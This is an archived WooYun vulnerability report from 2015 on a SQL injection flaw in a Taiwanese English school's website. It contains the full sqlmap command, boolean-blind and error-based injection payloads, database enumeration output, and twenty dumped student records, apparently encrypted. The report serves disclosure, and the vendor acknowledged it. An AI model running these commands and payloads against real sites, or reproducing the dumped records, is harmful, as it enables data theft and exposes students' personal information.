当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0156612

漏洞标题:唐威廉美語主站存在SQL註射漏洞(大量用戶密碼及個人隱私泄露)(臺灣地區)

相关厂商:唐威廉美語

漏洞作者: 路人甲

提交时间:2015-12-01 11:25

修复时间:2016-01-16 15:10

公开时间:2016-01-16 15:10

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:已交由第三方合作机构(Hitcon台湾互联网漏洞报告平台)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-12-01: 细节已通知厂商并且等待厂商处理中
2015-12-02: 厂商已经确认,细节仅向厂商公开
2015-12-12: 细节向核心白帽子及相关领域专家公开
2015-12-22: 细节向普通白帽子公开
2016-01-01: 细节向实习白帽子公开
2016-01-16: 细节向公众公开

简要描述:

唐威廉美語主站存在SQL註射漏洞(大量用戶密碼及個人隱私泄露)

详细说明:

地址:http://**.**.**.**/more.php?TYPE=news&PAGE=7

$ python sqlmap.py -u "http://**.**.**.**/more.php?TYPE=news&PAGE=7" -p TYPE --technique=BE --random-agent --batch  -D williamschool_www -T stud_file -C stud_Cname,stud_Pass,stud_Tele,stud_Emai,stud_Fnam --dump --start 1 --stop 20


| stud_file                             | 247     |


Database: williamschool_www
Table: stud_file
[20 entries]
+--------------------------+--------------------------+--------------------------+----------------------------------------------+------------+
| stud_Cname               | stud_Pass                | stud_Tele                | stud_Emai                                    | stud_Fnam  |
+--------------------------+--------------------------+--------------------------+----------------------------------------------+------------+
| 9djS9bBEc01z1q9zIS7E+g== | SZc6xzxNzgI=             | 67K+AVNu3WzCMPjIVLHQ2w== | /7OfI++7UkPonJftn7NgIdyux/65QuB9             | 唐威廉美語三峽北大校 |
| 7JB4eQyL87leVTIBQ0vlKQ== | dZ9lQTmZ+LS6hdR8DMPlyQ== | 9TNB7Tr+H8k/CR/NgmRIpA== | /FJEqAXHtkqB3ESa4bYPHCsgsh9xQFEM             | 唐威廉美語新莊光華校 |
| UZcx4hibRd08TQxzT9JF9w== | Tzb86Nd7SrtSqybg1lvsNw== | 19ybV86qISatJ6dYAKQFxQ== | /fJlpgqVocGNTpcIZzwoAeAzPWl+eRa6             | 唐威廉美語三峽北大校 |
| V3m2Agv1fUeiGe37rXcfIw== | 5l1bpgMDvjU=             | awni0P5GRq5IG8SnsFoMHw== | /Vn8L/asN6ozB4cPtEDxI4zHRI8ghnUqvyQfc01z9L8= | 唐威廉美語新莊光華校 |
| vzGDyl0jhMT9LJfeUd0qVA== | KFTOcEE1X7i/JB9zTXP0vw== | pttaTbLZIZk/CjZRa4/hMg== | +4KOktSoAZDfGRIvIOXyOZHIqEE6R/qQ             | 唐威廉美語三峽北大校 |
| XsvzsrtfuZL+lCZC3Vm/iA== | S3AJ2/8ljzZFhS9TBPsLfQ== | asAGDo9MaDB2bX8Lp9NRqA== | +h6Uqm9VfD+B3ESa4bYPHCsgsh9xQFEM             | 唐威廉美語板橋莒光校 |
| Ye7K3rziIOH9arkaeHUh8g== | 7LNfZp3oT5aZhZlV8LMcLw== | DoInEUb7kp11r8soOMbXtw== | +mBBydR4OPA1NsYUhoh5Iph4a+E7cfnM             | 唐威廉美語新莊光華校 |
| B3YzC7eUOqrJb4upTsBDxg== | DGMwobfelvQZBMqq6UFGjQ== | 4tOTyZH1duhlZ5sFrRPalQ== | +t0MXqMznJIPe+phYpsme0Z4QXaS/khqvyQfc01z9L8= | 唐威廉美語竹南校   |
| c0TjfZngjHEWB5TVj+ZH6A== | jcvV8cTgn5JAO2Ouhq2whw== | uE6SeyPRqlwLA0L77c5Qbg== | 01AZDhnTUDBb5s4O6eoV5r1iK4E7xanu             | 唐威廉美語新莊光華校 |
| c0TjfZngjHEWB5TVj+ZH6A== | Kz/+c3x4RM4=             | uE6SeyPRqlwLA0L77c5Qbg== | 01AZDhnTUDBmVwicoP9tRn2BFoPp1s4G             | 唐威廉美語新莊光華校 |
| vyQfc01z9L8=             | vyQfc01z9L8=             | vyQfc01z9L8=             | 022lf7XpE3F3k0C2dosVIa0QC3WZPv7EvyQfc01z9L8= | <blank>    |
| PELBJvXZorTPMJ+R3HWYNA== | LqdeDiOvA0E=             | ns1Yf1fKF6Sv3CdF6KoGrw== | 0CAG8emWlMos6uiFWuRvbdyux/65QuB9             | 唐威廉美語新莊光華校 |
| c9EVrcaPuCBtKkfkYle6hg== | sulx1LFa1Ow=             | q1OZ8m4qZgqC7DR9WUDlbA== | 0cpqhjyu1UDFUQQvvUciv9yux/65QuB9             | 唐威廉美語彰化校   |
| xULdD/95fGvtD0M2u5IB0w== | 07D267z3yWO/JB9zTXP0vw== | 1tMnTV9r1Pry5qOwsHBuLQ== | 0tzRVagPmTPfGARcs0ZKK6vbI8BsaEVQ             | 唐威廉美語三峽北大校 |
| rbuJZT1o+Yv/0w9usFBfiw== | nLNGCfCcbmEeqpUbus/11A== | igLnWOCXT8CKHX/5XAKr9g== | 150H4b91GmIbMrzvAxyf1F4LOxreGD1+             | 唐威廉美語三峽北大校 |
| j+nc8QtutXRtKkfkYle6hg== | 9oMjnTutwzi+W1DjDcZilw== | XQBJL1Q8neFAO2Ouhq2whw== | 1h7LEAU/YyQ72EGTXOctjqvbI8BsaEVQ             | 唐威廉美語三峽北大校 |
| XyUzvNSgOH65X1C5C7yagg== | s4PSI7k55GC/JB9zTXP0vw== | Hrb0aJhwqH5X3pCmXAlTBA== | 1x1kAIphBZ5kkAtlYdhAIavbI8BsaEVQ             | 唐威廉美語彰化校   |
| MXMAtHwRpwg8TQxzT9JF9w== | VqYwIdqUnCK/JB9zTXP0vw== | pvOh9gQ8NF7miXWaLBpspg== | 23j7NYdb1RbBzLli2H+I8dvDYNg0vVGw             | 唐威廉美語板橋莒光校 |
| Mey0rEZTmyY=             | TZW8t1zrcVm/JB9zTXP0vw== | 5NJwNPTuz7RNHunRZ9YimA== | 2FOb9q7gjvdA0wqAFjo+gqvbI8BsaEVQ             | 唐威廉美語三峽北大校 |
| yu0cTdAbEc8CfDTNTR67Ow== | YDKzUXsl8NaSsYjerHOZeA== | 2EKNHSJWqHDG3KUYVG1b8Q== | 2l3OxkWC3LvmT6yAwOBrq9yux/65QuB9             | 唐威廉美語三峽北大校 |
+--------------------------+--------------------------+--------------------------+----------------------------------------------+------------+

漏洞证明:

---
Parameter: TYPE (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: TYPE=-2339' OR 5779=5779#&PAGE=7
    Type: error-based
    Title: MySQL OR error-based - WHERE or HAVING clause
    Payload: TYPE=-6744' OR 1 GROUP BY CONCAT(0x71707a7871,(SELECT (CASE WHEN (1419=1419) THEN 1 ELSE 0 END)),0x71766b6271,FLOOR(RAND(0)*2)) HAVING MIN(0)#&PAGE=7
---
web application technology: PHP 5.3.29
back-end DBMS: MySQL >= 5.0.0
current user:    'www@%'
current user is DBA:    False
database management system users [1]:
[*] 'www'@'%'
Database: information_schema
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| COLUMNS                               | 1016    |
| SESSION_VARIABLES                     | 329     |
| GLOBAL_VARIABLES                      | 317     |
| GLOBAL_STATUS                         | 312     |
| SESSION_STATUS                        | 312     |
| COLLATION_CHARACTER_SET_APPLICABILITY | 197     |
| COLLATIONS                            | 197     |
| STATISTICS                            | 112     |
| PARTITIONS                            | 109     |
| TABLES                                | 109     |
| KEY_COLUMN_USAGE                      | 74      |
| TABLE_CONSTRAINTS                     | 71      |
| CHARACTER_SETS                        | 39      |
| PLUGINS                               | 23      |
| SCHEMA_PRIVILEGES                     | 18      |
| ENGINES                               | 9       |
| SCHEMATA                              | 2       |
| PROCESSLIST                           | 1       |
| USER_PRIVILEGES                       | 1       |
+---------------------------------------+---------+
Database: williamschool_www
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| page_tags                             | 18370   |
| card_file                             | 5576    |
| photo_pictures                        | 3914    |
| hwor_file                             | 2052    |
| mp3u_file                             | 1897    |
| page_rssnews2                         | 1749    |
| page_news                             | 1609    |
| page_rssnews                          | 1306    |
| logi_file                             | 1134    |
| fb_1000                               | 1099    |
| page_freeco                           | 651     |
| fb_tests                              | 506     |
| page_alliance                         | 267     |
| stud_file                             | 247     |
| page_sms                              | 228     |
| photo_config                          | 204     |
| page_dynco                            | 190     |
| page_sms_back                         | 180     |
| photo_filetypes                       | 105     |
| photo_albums                          | 77      |
| page_keyword                          | 74      |
| page_keyword_0908                     | 74      |
| photo_languages                       | 67      |
| fb_user                               | 56      |
| page_links                            | 30      |
| photo_categories                      | 28      |
| page_homco                            | 27      |
| teac_file                             | 21      |
| page_fran                             | 20      |
| page_fran2                            | 19      |
| photo_comments                        | 17      |
| coun_file                             | 10      |
| page_topalli                          | 10      |
| page_topeven                          | 10      |
| page_topnews                          | 10      |
| photo_usergroups                      | 9       |
| photo_bridge                          | 7       |
| bbs_file                              | 5       |
| page_dynme                            | 5       |
| page_freeme                           | 5       |
| page_mail                             | 5       |
| page_rss                              | 5       |
| page_rss2                             | 5       |
| page_user                             | 5       |
| opti_file                             | 3       |
| page_file                             | 3       |
| page_homme                            | 3       |
| photo_users                           | 2       |
| photo_votes                           | 2       |
| comp_config                           | 1       |
| page_config                           | 1       |
| page_frane                            | 1       |
| page_star                             | 1       |
| page_star_bak                         | 1       |
| photo_mod_online                      | 1       |
+---------------------------------------+---------+
columns LIKE 'pass' were found in the following databases:
Database: williamschool_www
Table: photo_albums
[2 columns]
+-------------------+-------------+
| Column            | Type        |
+-------------------+-------------+
| alb_password      | varchar(32) |
| alb_password_hint | text        |
+-------------------+-------------+
Database: williamschool_www
Table: page_user
[1 column]
+-----------+-------------+
| Column    | Type        |
+-----------+-------------+
| user_pass | varchar(20) |
+-----------+-------------+
Database: williamschool_www
Table: stud_file
[1 column]
+-----------+-------------+
| Column    | Type        |
+-----------+-------------+
| stud_Pass | varchar(30) |
+-----------+-------------+
Database: williamschool_www
Table: teac_file
[1 column]
+-----------+-------------+
| Column    | Type        |
+-----------+-------------+
| teac_Pass | varchar(20) |
+-----------+-------------+
Database: williamschool_www
Table: photo_users
[1 column]
+---------------+-------------+
| Column        | Type        |
+---------------+-------------+
| user_password | varchar(40) |
+---------------+-------------+
Database: williamschool_www
Table: page_fran
[1 column]
+-----------+-------------+
| Column    | Type        |
+-----------+-------------+
| fran_Pass | varchar(50) |
+-----------+-------------+


---
Parameter: TYPE (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: TYPE=-2339' OR 5779=5779#&PAGE=7
    Type: error-based
    Title: MySQL OR error-based - WHERE or HAVING clause
    Payload: TYPE=-6744' OR 1 GROUP BY CONCAT(0x71707a7871,(SELECT (CASE WHEN (1419=1419) THEN 1 ELSE 0 END)),0x71766b6271,FLOOR(RAND(0)*2)) HAVING MIN(0)#&PAGE=7
---
web application technology: PHP 5.3.29
back-end DBMS: MySQL 5
Database: williamschool_www
Table: stud_file
[23 columns]
+------------+--------------+
| Column     | Type         |
+------------+--------------+
| stud_Addr  | varchar(120) |
| stud_Auth  | varchar(10)  |
| stud_Birth | varchar(24)  |
| stud_Cdate | date         |
| stud_Cname | varchar(35)  |
| stud_Cuse  | varchar(25)  |
| stud_Edate | date         |
| stud_Emai  | varchar(100) |
| stud_Enam  | varchar(25)  |
| stud_Fnam  | varchar(30)  |
| stud_Fran  | int(3)       |
| stud_Leve  | int(2)       |
| stud_Mdate | date         |
| stud_Muse  | varchar(25)  |
| stud_Pass  | varchar(30)  |
| stud_Pem1  | varchar(100) |
| stud_Pem2  | varchar(100) |
| stud_Phon  | varchar(40)  |
| stud_Pnam  | varchar(25)  |
| stud_Prea  | varchar(15)  |
| stud_SN    | int(11)      |
| stud_Stau  | varchar(1)   |
| stud_Tele  | varchar(40)  |
+------------+--------------+
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: TYPE (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: TYPE=-2339' OR 5779=5779#&PAGE=7
    Type: error-based
    Title: MySQL OR error-based - WHERE or HAVING clause
    Payload: TYPE=-6744' OR 1 GROUP BY CONCAT(0x71707a7871,(SELECT (CASE WHEN (1419=1419) THEN 1 ELSE 0 END)),0x71766b6271,FLOOR(RAND(0)*2)) HAVING MIN(0)#&PAGE=7
---
web application technology: PHP 5.3.29
back-end DBMS: MySQL 5
Database: williamschool_www
Table: stud_file
[20 entries]
+--------------------------+--------------------------+--------------------------+----------------------------------------------+------------+
| stud_Cname               | stud_Pass                | stud_Tele                | stud_Emai                                    | stud_Fnam  |
+--------------------------+--------------------------+--------------------------+----------------------------------------------+------------+
| 9djS9bBEc01z1q9zIS7E+g== | SZc6xzxNzgI=             | 67K+AVNu3WzCMPjIVLHQ2w== | /7OfI++7UkPonJftn7NgIdyux/65QuB9             | 唐威廉美語三峽北大校 |
| 7JB4eQyL87leVTIBQ0vlKQ== | dZ9lQTmZ+LS6hdR8DMPlyQ== | 9TNB7Tr+H8k/CR/NgmRIpA== | /FJEqAXHtkqB3ESa4bYPHCsgsh9xQFEM             | 唐威廉美語新莊光華校 |
| UZcx4hibRd08TQxzT9JF9w== | Tzb86Nd7SrtSqybg1lvsNw== | 19ybV86qISatJ6dYAKQFxQ== | /fJlpgqVocGNTpcIZzwoAeAzPWl+eRa6             | 唐威廉美語三峽北大校 |
| V3m2Agv1fUeiGe37rXcfIw== | 5l1bpgMDvjU=             | awni0P5GRq5IG8SnsFoMHw== | /Vn8L/asN6ozB4cPtEDxI4zHRI8ghnUqvyQfc01z9L8= | 唐威廉美語新莊光華校 |
| vzGDyl0jhMT9LJfeUd0qVA== | KFTOcEE1X7i/JB9zTXP0vw== | pttaTbLZIZk/CjZRa4/hMg== | +4KOktSoAZDfGRIvIOXyOZHIqEE6R/qQ             | 唐威廉美語三峽北大校 |
| XsvzsrtfuZL+lCZC3Vm/iA== | S3AJ2/8ljzZFhS9TBPsLfQ== | asAGDo9MaDB2bX8Lp9NRqA== | +h6Uqm9VfD+B3ESa4bYPHCsgsh9xQFEM             | 唐威廉美語板橋莒光校 |
| Ye7K3rziIOH9arkaeHUh8g== | 7LNfZp3oT5aZhZlV8LMcLw== | DoInEUb7kp11r8soOMbXtw== | +mBBydR4OPA1NsYUhoh5Iph4a+E7cfnM             | 唐威廉美語新莊光華校 |
| B3YzC7eUOqrJb4upTsBDxg== | DGMwobfelvQZBMqq6UFGjQ== | 4tOTyZH1duhlZ5sFrRPalQ== | +t0MXqMznJIPe+phYpsme0Z4QXaS/khqvyQfc01z9L8= | 唐威廉美語竹南校   |
| c0TjfZngjHEWB5TVj+ZH6A== | jcvV8cTgn5JAO2Ouhq2whw== | uE6SeyPRqlwLA0L77c5Qbg== | 01AZDhnTUDBb5s4O6eoV5r1iK4E7xanu             | 唐威廉美語新莊光華校 |
| c0TjfZngjHEWB5TVj+ZH6A== | Kz/+c3x4RM4=             | uE6SeyPRqlwLA0L77c5Qbg== | 01AZDhnTUDBmVwicoP9tRn2BFoPp1s4G             | 唐威廉美語新莊光華校 |
| vyQfc01z9L8=             | vyQfc01z9L8=             | vyQfc01z9L8=             | 022lf7XpE3F3k0C2dosVIa0QC3WZPv7EvyQfc01z9L8= | <blank>    |
| PELBJvXZorTPMJ+R3HWYNA== | LqdeDiOvA0E=             | ns1Yf1fKF6Sv3CdF6KoGrw== | 0CAG8emWlMos6uiFWuRvbdyux/65QuB9             | 唐威廉美語新莊光華校 |
| c9EVrcaPuCBtKkfkYle6hg== | sulx1LFa1Ow=             | q1OZ8m4qZgqC7DR9WUDlbA== | 0cpqhjyu1UDFUQQvvUciv9yux/65QuB9             | 唐威廉美語彰化校   |
| xULdD/95fGvtD0M2u5IB0w== | 07D267z3yWO/JB9zTXP0vw== | 1tMnTV9r1Pry5qOwsHBuLQ== | 0tzRVagPmTPfGARcs0ZKK6vbI8BsaEVQ             | 唐威廉美語三峽北大校 |
| rbuJZT1o+Yv/0w9usFBfiw== | nLNGCfCcbmEeqpUbus/11A== | igLnWOCXT8CKHX/5XAKr9g== | 150H4b91GmIbMrzvAxyf1F4LOxreGD1+             | 唐威廉美語三峽北大校 |
| j+nc8QtutXRtKkfkYle6hg== | 9oMjnTutwzi+W1DjDcZilw== | XQBJL1Q8neFAO2Ouhq2whw== | 1h7LEAU/YyQ72EGTXOctjqvbI8BsaEVQ             | 唐威廉美語三峽北大校 |
| XyUzvNSgOH65X1C5C7yagg== | s4PSI7k55GC/JB9zTXP0vw== | Hrb0aJhwqH5X3pCmXAlTBA== | 1x1kAIphBZ5kkAtlYdhAIavbI8BsaEVQ             | 唐威廉美語彰化校   |
| MXMAtHwRpwg8TQxzT9JF9w== | VqYwIdqUnCK/JB9zTXP0vw== | pvOh9gQ8NF7miXWaLBpspg== | 23j7NYdb1RbBzLli2H+I8dvDYNg0vVGw             | 唐威廉美語板橋莒光校 |
| Mey0rEZTmyY=             | TZW8t1zrcVm/JB9zTXP0vw== | 5NJwNPTuz7RNHunRZ9YimA== | 2FOb9q7gjvdA0wqAFjo+gqvbI8BsaEVQ             | 唐威廉美語三峽北大校 |
| yu0cTdAbEc8CfDTNTR67Ow== | YDKzUXsl8NaSsYjerHOZeA== | 2EKNHSJWqHDG3KUYVG1b8Q== | 2l3OxkWC3LvmT6yAwOBrq9yux/65QuB9             | 唐威廉美語三峽北大校 |
+--------------------------+--------------------------+--------------------------+----------------------------------------------+------------+

修复方案:

上WAF。

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:16

确认时间:2015-12-02 15:09

厂商回复:

感謝通報

最新状态:

2016-01-12:HITCON 於接獲通報後除 email 該網站所示之服務信箱外,亦曾致電該網站負責人告知此漏洞,但對方至今仍無回應。